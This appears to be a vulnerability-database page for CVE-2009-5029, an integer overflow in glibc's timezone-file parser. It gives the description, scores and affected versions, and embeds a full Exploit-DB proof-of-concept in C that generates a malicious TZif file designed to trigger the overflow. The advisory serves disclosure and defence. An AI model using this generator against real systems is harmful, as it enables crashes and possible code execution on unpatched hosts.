CVE-2009-5029 : Detail

CVE-2009-5029

1.22%V3
Network
2013-05-02
14h00 +00:00
2013-05-02
14h00 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Integer overflow in the __tzfile_read function in glibc before 2.15 allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted timezone (TZ) file, as demonstrated using vsftpd.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-189 Category : Numeric Errors
Weaknesses in this category are related to improper calculation or conversion of numbers.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 36404

Publication date : 2009-05-31
22h00 +00:00
Author : dividead
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/50898/info GNU glibc is prone to an remote integer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code with the privileges of the user running an application that uses the affected library. #include <stdio.h> #include <stdint.h> #include <time.h> #include <string.h> #define TZ_MAGIC "TZif" #define PUT_32BIT_MSB(cp, value) \ do { \ (cp)[0] = (value) >> 24; \ (cp)[1] = (value) >> 16; \ (cp)[2] = (value) >> 8; \ (cp)[3] = (value); \ } while (0) struct tzhead { char tzh_magic[4]; char tzh_version[1]; char tzh_reserved[15]; char tzh_ttisgmtcnt[4]; char tzh_ttisstdcnt[4]; char tzh_leapcnt[4]; char tzh_timecnt[4]; char tzh_typecnt[4]; char tzh_charcnt[4]; }; struct ttinfo { long int offset; unsigned char isdst; unsigned char idx; unsigned char isstd; unsigned char isgmt; }; int main(void) { struct tzhead evil; int i; char *p; 42 uint32_t total_size; uint32_t evil1, evil2; /* Initialize static part of the header */ memcpy(evil.tzh_magic, TZ_MAGIC, sizeof(TZ_MAGIC) - 1); evil.tzh_version[0] = 0; memset(evil.tzh_reserved, 0, sizeof(evil.tzh_reserved)); memset(evil.tzh_ttisgmtcnt, 0, sizeof(evil.tzh_ttisgmtcnt)); memset(evil.tzh_ttisstdcnt, 0, sizeof(evil.tzh_ttisstdcnt)); memset(evil.tzh_leapcnt, 0, sizeof(evil.tzh_leapcnt)); memset(evil.tzh_typecnt, 0, sizeof(evil.tzh_typecnt)); /* Initialize nasty part of the header */ evil1 = 500; PUT_32BIT_MSB(evil.tzh_timecnt, evil1); total_size = evil1 * (sizeof(time_t) + 1); total_size = ((total_size + __alignof__ (struct ttinfo) - 1) & ~(__alignof__ (struct ttinfo) - 1)); /* value of chars, to get a malloc(0) */ evil2 = 0 - total_size; PUT_32BIT_MSB(evil.tzh_charcnt, evil2); p = (char *)&evil; for (i = 0; i < sizeof(evil); i++) printf("%c", p[i]); /* data we overflow with */ for (i = 0; i < 50000; i++) printf("A"); }

Products Mentioned

Configuraton 0

Gnu>>Glibc >> Version To (including) 2.14

Gnu>>Glibc >> Version 2.0

Gnu>>Glibc >> Version 2.0.1

Gnu>>Glibc >> Version 2.0.2

Gnu>>Glibc >> Version 2.0.3

Gnu>>Glibc >> Version 2.0.4

Gnu>>Glibc >> Version 2.0.5

Gnu>>Glibc >> Version 2.0.6

Gnu>>Glibc >> Version 2.1

Gnu>>Glibc >> Version 2.1.1

Gnu>>Glibc >> Version 2.1.1.6

Gnu>>Glibc >> Version 2.1.2

Gnu>>Glibc >> Version 2.1.3

Gnu>>Glibc >> Version 2.1.9

Gnu>>Glibc >> Version 2.13

References